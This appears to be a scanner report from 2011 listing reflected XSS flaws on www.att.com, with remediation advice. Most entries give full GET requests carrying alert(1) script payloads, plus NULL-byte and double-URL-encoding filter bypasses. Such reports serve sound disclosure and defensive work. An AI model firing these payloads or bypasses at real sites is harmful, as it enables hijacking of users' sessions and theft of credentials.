Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f79f'%3balert(1)//d23ede4a29f was submitted in the sid parameter. This input was echoed as 3f79f';alert(1)//d23ede4a29f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /esupport/article.jsp?wtSlotClick=1-006E1O-0-4&sid=KB4102733f79f'%3balert(1)//d23ede4a29f HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
...[SNIP]... <script type='text/javascript'> function rpt(socialSiteName){ var sid = "";
sid = 'KB4102733f79f';alert(1)//d23ede4a29f';
var wtCustView=''; var topicPath = ''; var wtSvcGrp = '8003'; var custViewMap = {'Browser':'BrowserSeg','Customer Type':'CustTypeSeg','Authentication':'AuthenticationSeg','Service':' ...[SNIP]...
The value of the sid request parameter is copied into an HTML comment. The payload 38891--><script>alert(1)</script>ef5a8842db6 was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /esupport/article.jsp?wtSlotClick=1-006E1O-0-4&sid=KB41027338891--><script>alert(1)</script>ef5a8842db6 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd659%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d846eec0e7 was submitted in the q parameter. This input was echoed as dd659"style="x:expression(alert(1))"d846eec0e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the q request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the view request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 919cc'%3balert(1)//460eba097b4 was submitted in the view parameter. This input was echoed as 919cc';alert(1)//460eba097b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /u-verse/explore/default.jsp?wtSlotClick=1-0056MZ-0-1&view=919cc'%3balert(1)//460eba097b4 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the wtSlotClick request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7a91"><script>alert(1)</script>16ad034658 was submitted in the wtSlotClick parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /u-verse/explore/default.jsp?wtSlotClick=1-0056MZ-0-1e7a91"><script>alert(1)</script>16ad034658&view=equipment#/installationCategory=true/uid=id4600 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3da8"><a>19f87201362 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b9ec"><a>ec455aa7b16 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de4a0"><a>cd2efd0c53f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d94"><a>a0156c11b52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /olam/loginAction.doviewf5d94"><a>a0156c11b52 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 p3p: CP="NON CUR OTPi OUR NOR UNI" Content-Length: 8658 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 11:12:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.10. https://www.att.com/olam/loginAction.doview [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.att.com
Path:
/olam/loginAction.doview
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00bd45b"><script>alert(1)</script>f4fe7ce44e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd45b"><script>alert(1)</script>f4fe7ce44e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.doview?%00bd45b"><script>alert(1)</script>f4fe7ce44e3=1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53d84"><a>f7a12303af0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /olam/loginAction.olamexecute53d84"><a>f7a12303af0 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 p3p: CP="NON CUR OTPi OUR NOR UNI" Content-Length: 8663 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 11:11:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The value of the customerType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ed408"><script>alert(1)</script>d60ee095b57 was submitted in the customerType parameter. This input was echoed as ed408"><script>alert(1)</script>d60ee095b57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of the customerType\u003dU request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a92a9"><script>alert(1)</script>ef0fe2d51f8 was submitted in the customerType\u003dU parameter. This input was echoed as a92a9"><script>alert(1)</script>ef0fe2d51f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?customerType\u003dU%00a92a9"><script>alert(1)</script>ef0fe2d51f8 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the customerType\u003dW request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002d989"><script>alert(1)</script>e13b914331e was submitted in the customerType\u003dW parameter. This input was echoed as 2d989"><script>alert(1)</script>e13b914331e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?customerType\u003dW%002d989"><script>alert(1)</script>e13b914331e HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dreferrer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002f906"><script>alert(1)</script>cd048c88fb5 was submitted in the dreferrer parameter. This input was echoed as 2f906"><script>alert(1)</script>cd048c88fb5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?wtSlotClick=1-005YH4-0-1&target=VB&dreferrer=%002f906"><script>alert(1)</script>cd048c88fb5&dsource=Manage_Account_CHP_ACC HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the dsource request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005736b"><script>alert(1)</script>d26d0379410 was submitted in the dsource parameter. This input was echoed as 5736b"><script>alert(1)</script>d26d0379410 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?wtSlotClick=1-005YH4-0-1&target=VB&dreferrer=&dsource=Manage_Account_CHP_ACC%005736b"><script>alert(1)</script>d26d0379410 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml: ...[SNIP]... <input type= "hidden" name="urlParameters" value="wtSlotClick=1-005YH4-0-1&target=VB&dreferrer=&dsource=Manage_Account_CHP_ACC%005736b"><script>alert(1)</script>d26d0379410&reportActionEvent=A_LGN_LOGIN_SUB"/> ...[SNIP]...
1.17. https://www.att.com/olam/loginAction.olamexecute [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.att.com
Path:
/olam/loginAction.olamexecute
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a2a20"><script>alert(1)</script>286f961bee9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a2a20"><script>alert(1)</script>286f961bee9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?%00a2a20"><script>alert(1)</script>286f961bee9=1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0082bda"><script>alert(1)</script>4e0c50d0e9e was submitted in the target parameter. This input was echoed as 82bda"><script>alert(1)</script>4e0c50d0e9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?target=UpgradePH%0082bda"><script>alert(1)</script>4e0c50d0e9e HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the target\u003dAAL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005fd2b"><script>alert(1)</script>09898f2a994 was submitted in the target\u003dAAL parameter. This input was echoed as 5fd2b"><script>alert(1)</script>09898f2a994 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?target\u003dAAL%005fd2b"><script>alert(1)</script>09898f2a994 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the target\u003dCRP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00adc47"><script>alert(1)</script>550669ce0b6 was submitted in the target\u003dCRP parameter. This input was echoed as adc47"><script>alert(1)</script>550669ce0b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?target\u003dCRP%00adc47"><script>alert(1)</script>550669ce0b6 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the target\u003dMF request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002fd9b"><script>alert(1)</script>fdca5b3bb94 was submitted in the target\u003dMF parameter. This input was echoed as 2fd9b"><script>alert(1)</script>fdca5b3bb94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?target\u003dMF%002fd9b"><script>alert(1)</script>fdca5b3bb94 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the target\u003dUpgradePH request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0010f65"><script>alert(1)</script>66e238b72d0 was submitted in the target\u003dUpgradePH parameter. This input was echoed as 10f65"><script>alert(1)</script>66e238b72d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?target\u003dUpgradePH%0010f65"><script>alert(1)</script>66e238b72d0 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the wtSlotClick request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0087e26"><script>alert(1)</script>1e53810140e was submitted in the wtSlotClick parameter. This input was echoed as 87e26"><script>alert(1)</script>1e53810140e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/loginAction.olamexecute?wtSlotClick=1-005R9W-0-5%0087e26"><script>alert(1)</script>1e53810140e HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the actionType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0053d8f"><script>alert(1)</script>48a0e57e4bc was submitted in the actionType parameter. This input was echoed as 53d8f"><script>alert(1)</script>48a0e57e4bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?actionType=Manage%0053d8f"><script>alert(1)</script>48a0e57e4bc HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the actionType\u003dBillPayments request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e6213"><script>alert(1)</script>b5abf72444d was submitted in the actionType\u003dBillPayments parameter. This input was echoed as e6213"><script>alert(1)</script>b5abf72444d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?actionType\u003dBillPayments%00e6213"><script>alert(1)</script>b5abf72444d HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the actionType\u003dHomePhoneProductLandingPage\u0026customerType\u003dL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f64b7"><script>alert(1)</script>da71049292c was submitted in the actionType\u003dHomePhoneProductLandingPage\u0026customerType\u003dL parameter. This input was echoed as f64b7"><script>alert(1)</script>da71049292c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?actionType\u003dHomePhoneProductLandingPage\u0026customerType\u003dL%00f64b7"><script>alert(1)</script>da71049292c HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the actionType\u003dInternetProductLandingPage\u0026customerType\u003dL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0072412"><script>alert(1)</script>13d5cf3f46e was submitted in the actionType\u003dInternetProductLandingPage\u0026customerType\u003dL parameter. This input was echoed as 72412"><script>alert(1)</script>13d5cf3f46e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?actionType\u003dInternetProductLandingPage\u0026customerType\u003dL%0072412"><script>alert(1)</script>13d5cf3f46e HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the actionType\u003dManage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0052a20"><script>alert(1)</script>78678aa89f6 was submitted in the actionType\u003dManage parameter. This input was echoed as 52a20"><script>alert(1)</script>78678aa89f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?actionType\u003dManage%0052a20"><script>alert(1)</script>78678aa89f6 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the actionType\u003dMessageCenter request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00456db"><script>alert(1)</script>b641abe6929 was submitted in the actionType\u003dMessageCenter parameter. This input was echoed as 456db"><script>alert(1)</script>b641abe6929 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?actionType\u003dMessageCenter%00456db"><script>alert(1)</script>b641abe6929 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the actionType\u003dTvProductLandingPage\u0026customerType\u003dU request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0026875"><script>alert(1)</script>5d9933fc293 was submitted in the actionType\u003dTvProductLandingPage\u0026customerType\u003dU parameter. This input was echoed as 26875"><script>alert(1)</script>5d9933fc293 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /olam/passthroughAction.myworld?actionType\u003dTvProductLandingPage\u0026customerType\u003dU%0026875"><script>alert(1)</script>5d9933fc293 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the actionType\u003dViewProfile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0078796"><script>alert(1)</script>2e7958efebf was submitted in the actionType\u003dViewProfile parameter. This input was echoed as 78796"><script>alert(1)</script>2e7958efebf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
